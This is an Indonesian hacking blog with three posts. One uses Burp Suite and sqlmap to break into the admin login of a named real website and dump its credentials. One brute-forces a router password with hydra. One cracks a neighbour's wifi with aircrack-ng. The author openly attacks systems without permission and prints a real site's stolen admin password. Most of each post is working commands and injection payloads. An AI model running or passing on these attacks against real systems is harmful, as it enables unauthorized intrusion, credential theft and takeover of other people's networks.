Selasa, 27 Januari 2015

Welcome back dude.
January is my special month, especialy today. I'm happy =))

Oke, langsung ke pembahasan. Saya akan membagikan sedikit tambahan tentang kombinasi antara kemanfaatan dua tool yang kadang saya gunakan untuk mendapatkan target saya.

  • Burpsuite
  • Sqlmap

Disini adalah kebingungan ketika kita mencari letak vulnerable parameter yang dikirimkan ke server karena si victim menggunakan basis data html. Maka step pertama yang saya lakukan adalah mencari tempat login si admin.
Oke, saya anggap kamu sudah mengetahui tempat loginnya.

Setting dulu kedua alat tadi, seperti ini.

Firefox -> Edit -> Preferences -> Advanced -> Network -> Setting -> Pilih Manual Proxy Configuration. Set HTTP PROXY dengan 0.0.0.0 dan PORT 8080

Burpsuite -> Tab Proxy -> Intercept -> Intercept is off


Login, agar burpsuite mencatat http request yang dikirim ke server dari website target



Treng!! username or password is incorrect, hahaha. Tidak apa-apa karena burpsuite sudah mencatat datanya.



Block tulisan seperti diatas, lalu tekan CTRL+ I
Pergi ke Intruder, kamu akan melihat catatan data tadi.
Kemudian Setting tab Position dan Payloads seperti gambar dibawah




Block data yang dikirim oleh parameter username dan password saja




Set payload type menjadi Runtime file dan load file bypass sql injection injection kamu.
Jika sudah klik menu Intruder -> Start attack


Respon 200 dan 302 disini hampir sama-sama memberikan hasil yang positif walaupun tidak semua, periksa lagi jika kamu melakukannya pada lain target.

Saya ambil seperti hasil scan diatas, dan mencoba login kembali

Username : ' or 1=1 limit 1 -- -+
Password  : ' or 1=1 limit 1 -- -+


Hasil dari login menunjukkan bahwa target mempunyai celah sql injection



Sampai disini kamu telah mengetahui letak yang bisa di inject. Step selanjutnya mari gunakan sqlmap
Kembali ke http respond, kita copy data yang dikirim ke server tadi

  • username=admin&password=admin&Input=Submit

sqlmap -u "http://eassenugu.com/rear/proccess_login.php" --data "username=admin&password=admin&Input=Submit" -p username --dbms mysql --dbs


Snip.. Snipp..

Saat mencari isi database, tables, columns tidak saya gambarkan disini, karena terlalu panjang

DB : digitav2_easse
Tables : setup
Columns : username,password

sqlmap -u "http://eassenugu.com/rear/proccess_login.php" --data "username=admin&password=admin&Input=Submit" -p username --dbms mysql -D digitav2_easse -T setup -C username,password --dump

username : admin, password : website. Untuk membuktikannya coba login kembali


Yeah, you now admin !!



Thanks : R-N for today =)) 

Posted on 08.56 by kakanDani

No comments

Sabtu, 17 Januari 2015

Hai kamu... ya kamu =)) =))
Postingan kali ini adalah kelanjutan dari post sebelumnya, yang kemarin saya jelaskan bagaimana mendapatkan password wi-fi. Sekarang saya akan tunjukkan bagaimana mendapatkan hak akses tertinggi wi-fi dengan cara menembus password router.

Oke, requirement tools

  • Brain
  • Hydra ( Available on Backtrack & Kali Linux ) 

Langsung saja

Checking koneksi dahulu

iwconfig wlan0


Next step, saya akan menggunakan hydra untuk bruteforce password.

hydra -l admin -P wordlist/listpassword.txt 192.168.1.1 http-get -m /

Jika berhasil akan tampak seperti ini




Keterangan :
  • l               : username
  • P              : path list password
  • http-get   : script yang digunakan untuk brute router
  • m             :  tidak diikut sertakan, tidak masalah

Untuk kebenaran tool, mari kita cocokkan




w00tz!! router taken over, selanjutnya merubah password,ssid atau lainnya terserah kamu =))

Posted on 07.46 by kakanDani

1 comment

Rabu, 14 Januari 2015

Haloo pemirsa..
Kali ini saya akan mem-post artikel bagaimana cara membobol password wifi. Bermula dari signal speed yang akhir ini sangat lemot di daerah saya, akhirnya saya berinisiatif membobol wifi tetangga. Bisa saya sebut dengan wifi imigration, hehe.

Walkthrough.

Pertama saya melakukan "Scanning SSID" untuk mencatat beberapa informasi seperti essid,bssid,dan channel.

iwlist [interface ] scanning

root@dani:[~]# iwlist wlan0 scanning

 

* Kotak merah adalah bssid target

Langkah kedua adalah menghentikan interface yang sedang berjalan, agar tidak mengganggu saat menggunakan proses airodump dan aireplay.

root@dani:[~]# airmon-ng check kill


Lanjutkan dengan perintah

airmon-ng start [ interface ]

root@dani:[~]# airmon-ng start wlan0


Pesan (monitor mode enabled on mon0) menunjukkan bahwa interface baru saya adalah mon0

Kemudian jalankan perintah airodump-ng untuk me-monitor dan menyimpan hasil yang nanti akan kamu pecahkan passwordnya

airodump-ng --write Wifi-ku --channel 1 --bssid F4:EC:38:C5:1C:C4 mon0


Biarkan berjalan, buka terminal baru lalu masukkan perintah aireplay-ng untuk mendapatkan WPA handshake

aireplay-ng -0 1 -a F4:EC:38:C5:1C:C4 -c 44:6D:57:79:82:C6 -e Wif-ku mon0

* Option -c diisi dengan Station yang muncul

Jika berhasil akan tampak seperti gambar dibawah

 

Jika sudah mendapatkan WPA handshake hentikan proses menggunakan ctrl+c.
Last step, memecahkan file yang berisi password wifi menggunakan aircrack-ng

aircrack-ng [ .cap file ] -w [ wordlist password ]

aircrack-ng Wifi-ku-01.cap -w wordlist/small-list.txt


Password cracked =))

Posted on 03.07 by kakanDani

No comments